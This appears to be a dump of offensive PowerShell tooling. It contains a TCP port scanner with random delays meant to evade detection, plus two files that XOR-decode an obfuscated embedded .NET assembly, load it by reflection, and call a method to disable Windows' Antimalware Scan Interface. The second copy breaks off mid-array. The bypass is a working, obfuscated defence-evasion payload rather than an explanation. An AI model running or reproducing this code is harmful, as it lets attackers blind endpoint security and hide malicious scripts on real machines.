| { 423 | TCP-PortScan -Portlist $Portlist 424 | } 425 | else 426 | { 427 | TCP-PortScan -TopPorts $TopPorts 428 | } 429 | } 430 | 431 | } 432 | 433 | 434 | function TCP-PortScan { 435 | <# 436 | .SYNOPSIS 437 | 438 | Perform a full TCP connection scan to the destination hostname, or to 'allports.exposed' if that destination is not supplied. 439 | 440 | Author: Joff Thyer, April 2014 441 | 442 | .DESCRIPTION 443 | 444 | TCP-Portscan is designed to perform a full TCP connection scan to the destination 445 | hostname using either a port range of top X number of popular TCP ports. The top 446 | popular port list is derived from NMAP's services using the frequrency measurements 447 | that appear in this file. If the top X number of popular ports is not the desired 448 | behavior, you can specify a minimum and maximum port number within which a range of 449 | ports will be scanned. By default, a random delay between 50 and 200 milliseconds 450 | is added in order to assist in avoiding detection. Also by default, if the hostname 451 | is not specified then 'allports.exposed' will be used as a default. The 'allports.exposed' 452 | site responds to all TCP ports will the text of 'woot woot' if an HTTP request is sent, 453 | but more to the point, all ports are considered open. 454 | 455 | .PARAMETER Hostname 456 | 457 | If provided, the hostname will be looked up and the resulting IP address used 458 | as the IP address to be scanned. If not provided, then the default hostname 459 | of 'allports.exposed' will be used. 460 | 461 | .PARAMETER MinPort 462 | 463 | Specify the minimum port number in a range of ports to be scanned. 464 | 465 | .PARAMETER MaxPort 466 | 467 | Specify the maximum port number in a range of ports to be scanned. 468 | 469 | .PARAMETER TopPorts 470 | 471 | Specify the number of popular ports which you would like to be scanned. Up to 472 | 128 ports may be specified. 473 | 474 | .PARAMETER Timeout 475 | 476 | Specify the TCP connection timeout in the range of 10 - 10000 milliseconds. 477 | 478 | .PARAMETER NoRandomDelay 479 | 480 | Disable the random delay between connection attempts. 481 | 482 | #> 483 | 484 | param( [String]$Hostname = 'allports.exposed', 485 | [ValidateRange(1,65535)][Int]$MinPort = 1, 486 | [ValidateRange(1,65535)][Int]$MaxPort = 1, 487 | [ValidateRange(1,128)][Int]$TopPorts = 50, 488 | [ValidateRange(10,10000)][Int]$Timeout = 400, 489 | [ValidateRange(1,65535)][String[]]$Portlist = "", 490 | [switch]$NoRandomDelay = $false ) 491 | 492 | $resolved = [System.Net.Dns]::GetHostByName($Hostname) 493 | $ip = $resolved.AddressList[0].IPAddressToString 494 | 495 | # TopN port collection derived from NMAP project 496 | $tcp_top128 = 80, 23, 443, 21, 22, 25, 3389, 110, 445, 139, 143, 53, ` 497 | 135, 3306, 8080, 1723, 111, 995, 993, 5900, 1025, 587, 8888, 199, ` 498 | 1720, 465, 548, 113, 81, 6001, 10000, 514, 5060, 179, 1026, 2000, ` 499 | 8443, 8000, 32768, 554, 26, 1433, 49152, 2001, 515, 8008, 49154, 1027, ` 500 | 5666, 646, 5000, 5631, 631, 49153, 8081, 2049, 88, 79, 5800, 106, ` 501 | 2121, 1110, 49155, 6000, 513, 990, 5357, 427, 49156, 543, 544, 5101, ` 502 | 144, 7, 389, 8009, 3128, 444, 9999, 5009, 7070, 5190, 3000, 5432, ` 503 | 3986, 13, 1029, 9, 6646, 49157, 1028, 873, 1755, 2717, 4899, 9100, ` 504 | 119, 37, 1000, 3001, 5001, 82, 10010, 1030, 9090, 2107, 1024, 2103, ` 505 | 6004, 1801, 19, 8031, 1041, 255, 3703, 17, 808, 3689, 1031, 1071, ` 506 | 5901, 9102, 9000, 2105, 636, 1038, 2601, 7000 507 | 508 | $report = @() 509 | if ($MaxPort -gt 1 -and $MinPort -lt $MaxPort) { 510 | $ports = $MinPort..$MaxPort 511 | Write-Host -NoNewline "[*] Scanning $Hostname ($ip), port range $MinPort -> $MaxPort : " 512 | } 513 | elseif ($MaxPort -lt $MinPort) { 514 | Throw "Are you out of your mind? Port range cannot go negative." 515 | } 516 | elseif($Portlist -ne ""){ 517 | $ports = $Portlist 518 | Write-Host -NoNewline "[*] Scanning $Hostname ($ip), using the portlist provided." 519 | } 520 | else { 521 | $PortDiff = $TopPorts - 1 522 | $ports = $tcp_top128[0..$PortDiff] 523 | Write-Host -NoNewline "[*] Scanning $Hostname ($ip), top $TopPorts popular ports : " 524 | } 525 | 526 | $total = 0 527 | $tcp_count = 0 528 | foreach ($port in Get-Random -input $ports -count $ports.Count) { 529 | if (![Math]::Floor($total % ($ports.Count / 10))) { 530 | Write-Host -NoNewline "." 531 | } 532 | $total += 1 533 | $temp = "" | Select Address, Port, Proto, Status, Banner 534 | $temp.Proto = "tcp" 535 | $temp.Port = $port 536 | $temp.Address = $ip 537 | $tcp = new-Object system.Net.Sockets.TcpClient 538 | $connect = $tcp.BeginConnect($ip,$port,$null,$null) 539 | $wait = $connect.AsyncWaitHandle.WaitOne($Timeout,$false) 540 | if (!$wait) { 541 | $error.clear() 542 | $tcp.close() 543 | $temp.Status = "closed" 544 | } 545 | else { 546 | try { 547 | $tcp.EndConnect($connect) 548 | $tcp.Close() 549 | $temp.Status = "open" 550 | $tcp_count += 1 551 | } 552 | catch { 553 | $temp.Status = "reset" 554 | } 555 | } 556 | $report += $temp 557 | 558 | # add random delay if we want it 559 | if (!$NoRandomDelay) { 560 | $sleeptime = Get-Random -Minimum 50 -Maximum 200 561 | Start-Sleep -Milliseconds $sleeptime 562 | } 563 | } 564 | Write-Host 565 | $columns = @{l='IP-Address';e={$_.Address}; w=15; a="left"},@{l='Proto';e={$_.Proto};w=5;a="right"},@{l='Port';e={$_.Port}; w=5; a="right"},@{l='Status';e={$_.Status}; w=4; a="right"} 566 | $report | where {$_.Status -eq "open"} | Sort-Object Port | Format-Table $columns -AutoSize 567 | Write-Output "[*] $tcp_count out of $total scanned ports are open!" 568 | } 569 | -------------------------------------------------------------------------------- /ps/amsi-bypass.txt: -------------------------------------------------------------------------------- 1 | function AMSBP 2 | { 3 | if (-not ([System.Management.Automation.PSTypeName]"BP.AMS").Type) { 4 | $byteArray = @(121,12,210,23,62,52,86,66,19,61,52,86,189,232,61,52,238,66,23,61,52,86,66,23,125,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,180,86,66,23,51,43,236,76,23,137,61,155,99,175,60,120,155,99,67,85,93,37,98,103,79,91,49,48,118,80,20,53,35,121,83,91,34,98,117,88,20,36,55,121,29,93,56,98,83,114,103,118,47,120,89,81,120,79,26,55,16,86,66,23,61,52,86,66,71,120,52,86,14,22,62,52,223,244,211,96,52,86,66,23,61,52,86,66,247,61,54,119,73,22,54,52,86,74,23,61,52,80,66,23,61,52,86,66,217,27,52,86,66,55,61,52,86,2,23,61,52,86,66,7,61,20,86,66,23,63,52,86,70,23,61,52,86,66,23,61,48,86,66,23,61,52,86,66,23,189,52,86,66,21,61,52,86,66,23,61,55,86,2,146,61,52,70,66,23,45,52,86,66,23,45,52,86,82,23,61,52,86,66,23,45,52,86,66,23,61,52,86,66,23,61,52,214,100,23,61,127,86,66,23,61,116,86,66,167,63,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,93,52,86,78,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,20,86,66,31,61,52,86,66,23,61,52,86,66,23,61,60,118,66,23,117,52,86,66,23,61,52,86,66,23,61,52,120,54,114,69,64,86,66,23,233,50,86,66,23,29,52,86,66,31,61,52,86,64,23,61,52,86,66,23,61,52,86,66,23,61,52,86,98,23,61,84,120,48,100,79,87,86,66,23,141,54,86,66,23,125,52,86,66,19,61,52,86,72,23,61,52,86,66,23,61,52,86,66,23,61,52,86,2,23,61,116,120,48,114,81,91,53,66,23,49,52,86,66,23,93,52,86,66,21,61,52,86,76,23,61,52,86,66,23,61,52,86,66,23,61,52,86,2,23,61,118,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,242,49,61,52,86,66,23,61,124,86,66,23,63,52,83,66,87,28,52,86,2,18,61,52,87,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,81,39,57,52,138,66,23,61,53,86,66,6,79,53,86,66,103,21,54,86,66,17,55,50,36,81,23,61,68,126,67,23,61,50,93,89,63,56,52,86,72,27,43,57,81,74,8,125,38,85,106,20,61,52,80,100,0,176,51,86,66,22,46,62,71,72,1,34,5,202,83,29,46,48,65,207,16,61,52,87,81,28,44,63,64,98,232,61,52,86,222,6,54,39,83,85,154,58,52,86,67,4,49,37,90,84,55,173,52,86,66,139,44,56,69,68,0,21,50,86,66,29,46,51,71,70,1,44,51,65,106,16,61,52,92,69,8,38,28,94,66,23,55,37,81,85,63,57,52,86,68,0,21,50,86,66,29,46,60,71,71,1,44,60,65,106,16,61,52,92,69,8,33,28,94,66,23,55,37,94,85,63,57,52,86,68,0,21,50,86,66,29,46,61,71,68,1,44,61,65,106,16,61,52,92,69,8,32,28,94,66,23,55,37,95,85,63,57,52,86,68,101,12,52,86,50,63,52,52,86,72,61,35,54,126,72,23,61,62,124,0,68,119,118,87,66,22,61,52,86,66,23,49,52,86,66,97,9,26,102,108,36,13,7,103,123,23,61,52,86,71,23,81,52,86,66,195,60,52,86,97,105,61,52,22,64,23,61,196,87,66,23,30,103,34,48,126,83,83,37,66,23,61,52,102,70,23,61,88,86,66,23,30,97,5,66,139,57,52,86,82,23,61,52,117,5,66,116,112,86,66,23,145,48,86,66,131,61,52,86,97,85,81,91,52,66,23,61,52,86,66,23,63,52,86,67,80,40,54,66,75,23,61,52,86,184,50,14,52,64,66,23,60,52,86,66,29,61,52,86,64,23,61,52,80,66,23,61,62,86,66,23,55,52,86,66,21,61,52,86,67,23,61,52,84,66,23,61,48,86,66,23,60,52,86,66,22,61,52,86,66,23,55,52,87,66,23,61,52,86,68,23,13,52,127,66,17,61,232,86,255,23,59,52,65,67,224,61,50,86,117,22,202,52,80,66,119,60,137,86,68,23,170,53,127,66,17,61,159,87,107,23,59,52,230,67,170,61,50,86,136,22,20,52,80,66,202,60,29,86,66,23,61,52,87,66,23,61,52,86,67,23,60,52,87,66,7,61,45,86,95,23,56,52,87,66,22,61,52,86,66,23,189,52,192,98,32,61,62,86,67,23,61,52,86,66,151,61,162,118,4,23,45,52,85,66,23,61,52,86,194,23,171,20,4,66,2,61,48,86,66,23,61,52,214,66,134,29,85,86,92,23,53,52,6,98,23,61,52,86,212,23,81,52,115,66,28,61,12,119,66,23,61,52,208,90,99,61,29,86,73,23,61,52,87,66,109,61,52,86,64,23,191,52,86,66,22,61,191,86,66,23,60,52,198,66,23,61,54,86,216,23,61,52,85,66,182,61,54,86,70,23,147,52,86,66,22,61,221,86,66,23,63,52,184,66,23,61,55,86,176,23,44,52,34,66,62,61,45,86,54,23,16,52,119,66,99,61,29,86,107,23,73,52,100,66,38,61,171,87,117,23,124,52,238,67,43,61,117,86,135,22,124,52,31,66,198,60,126,86,19,23,216,53,6,66,30,61,64,86,107,23,19,52,69,66,124,61,26,86,89,23,73,52,3,66,100,60,72,87,66,22,62,52,97,66,22,61,52,87,71,23,123,52,87,66,23,60,51,86,16,23,60,52,86,67,30,61,189,87,64,23,57,180,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,23,22,61,52,82,66,23,61,52,86,66,23,61,52,86,66,22,61,20,86,66,23,61,52,86,66,23,1,121,57,38,98,81,81,104,66,68,82,65,36,33,114,83,81,33,112,57,89,88,58,66,86,112,103,86,0,71,61,89,37,33,120,79,88,63,32,23,110,77,37,54,114,80,52,25,32,125,88,87,34,66,80,88,64,6,48,120,94,117,50,38,101,88,71,37,66,91,82,85,50,14,126,95,70,55,48,110,61,98,63,48,99,72,85,58,18,101,82,64,51,33,99,61,121,57,52,114,112,81,59,45,101,68,52,18,43,100,92,86,58,39,23,19,87,34,45,101,61,92,27,45,115,72,88,51,66,103,79,91,53,12,118,80,81,86,44,118,80,81,86,46,103,124,80,50,48,114,78,71,86,38,96,110,93,44,39,23,91,88,24,39,96,109,70,57,54,114,94,64,86,46,103,91,88,25,46,115,109,70,57,54,114,94,64,86,17,110,78,64,51,47,57,111,65,56,54,126,80,81,120,11,121,73,81,36,45,103,110,81,36,52,126,94,81,37,66,88,72,64,23,54,99,79,93,52,55,99,88,52,50,39,100,73,52,37,48,116,61,71,63,56,114,61,103,47,49,99,88,89,120,16,98,83,64,63,47,114,19,119,57,47,103,84,88,51,48,68,88,70,32,43,116,88,71,86,1,120,80,68,63,46,118,73,93,57,44,69,88,88,55,58,118,73,93,57,44,100,124,64,34,48,126,95,65,34,39,23,111,65,56,54,126,80,81,21,45,122,77,85,34,43,117,84,88,63,54,110,124,64,34,48,126,95,65,34,39,23,110,91,35,48,116,88,90,51,53,37,61,112,58,46,94,80,68,57,48,99,124,64,34,48,126,95,65,34,39,23,86,81,36,44,114,81,7,100,66,92,88,70,56,39,123,14,6,120,38,123,81,52,4,54,123,112,91,32,39,90,88,89,57,48,110,61,97,31,44,99,109,64,36,66,120,77,107,19,58,103,81,93,53,43,99,61,118,47,54,114,61,121,55,48,100,85,85,58,66,86,81,88,57,33,95,122,88,57,32,118,81,52,21,45,103,68,52,31,44,99,109,64,36,66,120,77,107,23,38,115,84,64,63,45,121,61,119,57,44,100,82,88,51,66,64,79,93,34,39,91,84,90,51,66,23,61,37,55,66,122,61,71,86,43,23,19,52,50,66,123,61,88,86,66,10,124,52,59,66,100,61,93,86,17,23,94,52,55,66,121,61,118,86,55,23,91,52,48,66,114,61,70,86,66,32,112,52,51,66,122,61,91,86,48,23,68,52,118,66,103,61,85,86,54,23,94,52,62,66,114,61,80,86,98,23,78,52,35,66,116,61,87,86,39,23,78,52,37,66,113,61,65,86,46,23,68,52,120,66,23,61,52,86,197,238,135,238,177,225,85,119,135,0,136,119,191,70,188,86,23,53,131,44,30,65,36,0,182,203,18,61,54,78,90,25,57,52,87,90,25,53,52,82,64,15,36,61,70,75,17,61,55,87,90,15,53,55,86,66,22,62,20,86,67,19,29,53,87,74,19,29,53,87,76,19,61,53,79,75,19,61,53,78,74,31,61,48,87,95,18,53,44,94,71,23,63,44,78,74,19,61,53,87,76,2,58,57,78,90,14,52,41,83,95,18,32,49,78,90,15,32,49,75,71,10,56,60,87,66,31,61,52,86,66,23,35,53,86,67,23,105,54,64,21,101,92,68,24,45,121,120,76,53,39,103,73,93,57,44,67,85,70,57,53,100,60,52,254,100,23,61,52,86,66,23,61,52,86,66,169,27,52,86,66,55,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,230,100,23,61,52,86,66,23,61,52,9,1,120,79,112,58,46,90,92,93,56,66,122,78,87,57,48,114,88,26,50,46,123,61,52,86,66,23,194,17,86,98,23,45,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,60,52,70,66,23,61,44,86,66,151,61,52,86,66,23,61,52,86,66,23,61,52,86,66,22,61,53,86,66,23,13,52,86,194,23,61,52,86,66,23,61,52,86,66,23,61,52,86,67,23,61,52,86,66,95,61,52,86,26,87,61,52,2,64,23,61,52,86,66,23,61,52,86,66,67,63,0,86,66,23,107,52,5,66,72,61,98,86,7,23,111,52,5,66,94,61,123,86,12,23,98,52,31,66,89,61,114,86,13,23,61,52,86,66,170,57,219,168,66,23,60,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,125,23,61,52,86,66,23,61,48,86,66,23,63,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,112,86,66,23,60,52,0,66,118,61,70,86,4,23,84,52,58,66,114,61,125,86,44,23,91,52,57,66,23,61,52,86,102,23,57,52,86,66,67,61,70,86,35,23,83,52,37,66,123,61,85,86,54,23,84,52,57,66,121,61,52,86,66,23,61,52,230,70,163,60,52,86,67,23,110,52,34,66,101,61,93,86,44,23,90,52,16,66,126,61,88,86,39,23,116,52,56,66,113,61,91,86,66,23,173,53,86,66,22,61,4,86,114,23,13,52,102,66,39,61,0,86,32,23,13,52,86,66,59,61,54,86,67,23,123,52,63,66,123,61,81,86,6,23,88,52,37,66,116,61,70,86,43,23,77,52,34,66,126,61,91,86,44,23,61,52,86,66,55,61,52,86,114,23,53,52,87,66,81,61,93,86,46,23,88,52,0,66,114,61,70,86,49,23,84,52,57,66,121,61,52,86,66,23,13,52,120,66,39,61,26,86,114,23,19,52,102,66,23,61,116,86,77,23,60,52,31,66,121,61,64,86,39,23,79,52,56,66,118,61,88,86,12,23,92,52,59,66,114,61,52,86,17,23,82,52,35,66,101,61,87,86,39,23,83,52,51,66,96,61,6,86,108,23,89,52,58,66,123,61,52,86,66,23,21,52,84,66,22,61,120,86,39,23,90,52,55,66,123,61,119,86,45,23,77,52,47,66,101,61,93,86,37,23,85,52,34,66,23,61,20,86,66,23,117,52,89,66,22,61,123,86,48,23,84,52,49,66,126,61,90,86,35,23,81,52,16,66,126,61,88,86,39,23,83,52,55,66,122,61,81,86,66,23,110,52,57,66,98,61,70,86,33,23,88,52,56,66,114,61,67,86,112,23,19,52,50,66,123,61,88,86,66,23,61,52,98,66,31,61,53,86,18,23,79,52,57,66,115,61,65,86,33,23,73,52,0,66,114,61,70,86,49,23,84,52,57,66,121,61,52,86,114,23,19,52,102,66,57,61,4,86,108,23,13,52,86,66,47,61,60,86,67,23,124,52,37,66,100,61,81,86,47,23,95,52,58,66,110,61,20,86,20,23,88,52,36,66,100,61,93,86,45,23,83,52,86,66,39,61,26,86,114,23,19,52,102,66,57,61,4,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,20,86,66,27,61,52,86,146,33,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52) 5 | $KeyArray = @(52, 86, 66, 23, 61) 6 | $keyposition = 0 7 | for ($i = 0; $i -lt $byteArray.count; $i++) 8 | { 9 | $byteArray[$i] = $byteArray[$i] -bxor $KeyArray[$keyposition] 10 | $keyposition += 1 11 | if ($keyposition -eq $keyArray.Length) { $keyposition = 0 } 12 | } 13 | [Reflection.Assembly]::Load([byte[]]$byteArray) | Out-Null 14 | Write-Output "DLL has been reflected" 15 | } 16 | [BP.AMS]::Disable() 17 | } 18 | 19 | 20 | AMSBP 21 | 22 | -------------------------------------------------------------------------------- /ps/amsi-bypass_k.ps1: -------------------------------------------------------------------------------- 1 | function AMSBP 2 | { 3 | if (-not ([System.Management.Automation.PSTypeName]"BP.AMS").Type) { 4 | $byteArray = @(121,12,210,23,62,52,86,66,19,61,52,86,189,232,61,52,238,66,23,61,52,86,66,23,125,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,180,86,66,23,51,43,236,76,23,137,61,155,99,175,60,120,155,99,67,85,93,37,98,103,79,91,49,48,118,80,20,53,35,121,83,91,34,98,117,88,20,36,55,121,29,93,56,98,83,114,103,118,47,120,89,81,120,79,26,55,16,86,66,23,61,52,86,66,71,120,52,86,14,22,62,52,223,244,211,96,52,86,66,23,61,52,86,66,247,61,54,119,73,22,54,52,86,74,23,61,52,80,66,23,61,52,86,66,217,27,52,86,66,55,61,52,86,2,23,61,52,86,66,7,61,20,86,66,23,63,52,86,70,23,61,52,86,66,23,61,48,86,66,23,61,52,86,66,23,189,52,86,66,21,61,52,86,66,23,61,55,86,2,146,61,52,70,66,23,45,52,86,66,23,45,52,86,82,23,61,52,86,66,23,45,52,86,66,23,61,52,86,66,23,61,52,214,100,23,61,127,86,66,23,61,116,86,66,167,63,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,93,52,86,78,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,20,86,66,31,61,52,86,66,23,61,52,86,66,23,61,60,118,66,23,117,52,86,66,23,61,52,86,66,23,61,52,120,54,114,69,64,86,66,23,233,50,86,66,23,29,52,86,66,31,61,52,86,64,23,61,52,86,66,23,61,52,86,66,23,61,52,86,98,23,61,84,120,48,100,79,87,86,66,23,141,54,86,66,23,125,52,86,66,19,61,52,86,72,23,61,52,86,66,23,61,52,86,66,23,61,52,86,2,23,61,116,120,48,114,81,91,53,66,23,49,52,86,66,23,93,52,86,66,21,61,52,86,76,23,61,52,86,66,23,61,52,86,66,23,61,52,86,2,23,61,118,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,242,49,61,52,86,66,23,61,124,86,66,23,63,52,83,66,87,28,52,86,2,18,61,52,87,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,81,39,57,52,138,66,23,61,53,86,66,6,79,53,86,66,103,21,54,86,66,17,55,50,36,81,23,61,68,126,67,23,61,50,93,89,63,56,52,86,72,27,43,57,81,74,8,125,38,85,106,20,61,52,80,100,0,176,51,86,66,22,46,62,71,72,1,34,5,202,83,29,46,48,65,207,16,61,52,87,81,28,44,63,64,98,232,61,52,86,222,6,54,39,83,85,154,58,52,86,67,4,49,37,90,84,55,173,52,86,66,139,44,56,69,68,0,21,50,86,66,29,46,51,71,70,1,44,51,65,106,16,61,52,92,69,8,38,28,94,66,23,55,37,81,85,63,57,52,86,68,0,21,50,86,66,29,46,60,71,71,1,44,60,65,106,16,61,52,92,69,8,33,28,94,66,23,55,37,94,85,63,57,52,86,68,0,21,50,86,66,29,46,61,71,68,1,44,61,65,106,16,61,52,92,69,8,32,28,94,66,23,55,37,95,85,63,57,52,86,68,101,12,52,86,50,63,52,52,86,72,61,35,54,126,72,23,61,62,124,0,68,119,118,87,66,22,61,52,86,66,23,49,52,86,66,97,9,26,102,108,36,13,7,103,123,23,61,52,86,71,23,81,52,86,66,195,60,52,86,97,105,61,52,22,64,23,61,196,87,66,23,30,103,34,48,126,83,83,37,66,23,61,52,102,70,23,61,88,86,66,23,30,97,5,66,139,57,52,86,82,23,61,52,117,5,66,116,112,86,66,23,145,48,86,66,131,61,52,86,97,85,81,91,52,66,23,61,52,86,66,23,63,52,86,67,80,40,54,66,75,23,61,52,86,184,50,14,52,64,66,23,60,52,86,66,29,61,52,86,64,23,61,52,80,66,23,61,62,86,66,23,55,52,86,66,21,61,52,86,67,23,61,52,84,66,23,61,48,86,66,23,60,52,86,66,22,61,52,86,66,23,55,52,87,66,23,61,52,86,68,23,13,52,127,66,17,61,232,86,255,23,59,52,65,67,224,61,50,86,117,22,202,52,80,66,119,60,137,86,68,23,170,53,127,66,17,61,159,87,107,23,59,52,230,67,170,61,50,86,136,22,20,52,80,66,202,60,29,86,66,23,61,52,87,66,23,61,52,86,67,23,60,52,87,66,7,61,45,86,95,23,56,52,87,66,22,61,52,86,66,23,189,52,192,98,32,61,62,86,67,23,61,52,86,66,151,61,162,118,4,23,45,52,85,66,23,61,52,86,194,23,171,20,4,66,2,61,48,86,66,23,61,52,214,66,134,29,85,86,92,23,53,52,6,98,23,61,52,86,212,23,81,52,115,66,28,61,12,119,66,23,61,52,208,90,99,61,29,86,73,23,61,52,87,66,109,61,52,86,64,23,191,52,86,66,22,61,191,86,66,23,60,52,198,66,23,61,54,86,216,23,61,52,85,66,182,61,54,86,70,23,147,52,86,66,22,61,221,86,66,23,63,52,184,66,23,61,55,86,176,23,44,52,34,66,62,61,45,86,54,23,16,52,119,66,99,61,29,86,107,23,73,52,100,66,38,61,171,87,117,23,124,52,238,67,43,61,117,86,135,22,124,52,31,66,198,60,126,86,19,23,216,53,6,66,30,61,64,86,107,23,19,52,69,66,124,61,26,86,89,23,73,52,3,66,100,60,72,87,66,22,62,52,97,66,22,61,52,87,71,23,123,52,87,66,23,60,51,86,16,23,60,52,86,67,30,61,189,87,64,23,57,180,86,66,23,61,52,86,66,23,61,52,86,66,23,61,52,86,23,22,61,52,82,66,23,61,52,86,66,23,61,52,86,66,22,61,20,86,66,23,61,52,86,66,23,1,121,57,38,98,81,81,104,66,68,82,65,36,33,114,83,81,33,112,57,89,88,58,66,86,112,103,86,0,71,61,89,37,33,120,79,88,63,32,23,110,77,37,54,114,80,52,25,32,125,88,87,34,66,80,88,64,6,48,120,94,117,50,38,101,88,71,37,66,91,82,85,50,14,126,95,70,55,48,110,61,98,63,48,99,72,85,58,18,101,82,64,51,33,99,61,121,57,52,114,112,81,59,45,101,68,52,18,43,100,92,86,58,39,23,19,87,34,45,101,61,92,27,45,115,72,88,51,66,103,79,91,53,12,118,80,81,86,44,118,80,81,86,46,103,124,80,50,48,114,78,71,86,38,96,110,93,44,39,23,91,88,24,39,96,109,70,57,54,114,94,64,86,46,103,91,88,25,46,115,109,70,57,54,114,94,64,86,17,110,78,64,51,47,57,111,65,56,54,126,80,81,120,11,121,73,81,36,45,103,110,81,36,52,126,94,81,37,66,88,72,64,23,54,99,79,93,52,55,99,88,52,50,39,100,73,52,37,48,116,61,71,63,56,114,61,103,47,49,99,88,89,120,16,98,83,64,63,47,114,19,119,57,47,103,84,88,51,48,68,88,70,32,43,116,88,71,86,1,120,80,68,63,46,118,73,93,57,44,69,88,88,55,58,118,73,93,57,44,100,124,64,34,48,126,95,65,34,39,23,111,65,56,54,126,80,81,21,45,122,77,85,34,43,117,84,88,63,54,110,124,64,34,48,126,95,65,34,39,23,11